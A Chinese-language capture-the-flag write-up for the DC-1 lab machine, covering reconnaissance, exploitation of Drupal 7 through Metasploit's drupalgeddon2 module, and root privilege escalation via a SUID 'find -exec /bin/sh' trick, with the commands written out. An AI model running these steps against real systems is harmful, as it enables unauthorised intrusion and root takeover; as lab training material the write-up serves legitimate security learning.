DC1 - 走看看

zoukankan html css js c++ java

DC1

1.收集信息
cms信息使用的是Drupal的cms
端口信息开开启了22端口，80端口，111端口
目录信息扫到敏感目录 http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出，使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的，rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标，得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式，suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来，发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来，发现成功，获得root权限
提权成功，接下来任意妄为寻找flag

查看全文

相关阅读:
编译 netcat for lineage-17.1-20210303-UNOFFICIAL-dipper.zip (ARM)
Mi8-Android-arm 中网络接口命名：wlan0 & rmnet_data 《========》 VB-Android-x86 中网络接口命名：eth1 & wifi_eth
HOW TO CHANGE LINUX KERNEL DMESG BUFFER SIZE
Calculation of RTO in tcp and related open source implementation (Linux kernel, unbound) --- rtt, rttvar, cwnd, ssthresh
图解Linux网络包接收过程
 Tcpprobe 在网络中的使用 --- tcp_probe has been removed from the kernel. --- Using ip-tcp_metrics --- Using ss (socket statistics)
全面的 iPerf3 Android平台移植编译、运行过程记录
 socket、sock、sk_buff、net_device 关系图
 tcp: Add TCP_FREEZE socket option
ECNU 2031 绝对值排序

原文地址：https://www.cnblogs.com/sup3rman/p/12389296.html

Copyright © 2011-2022 走看看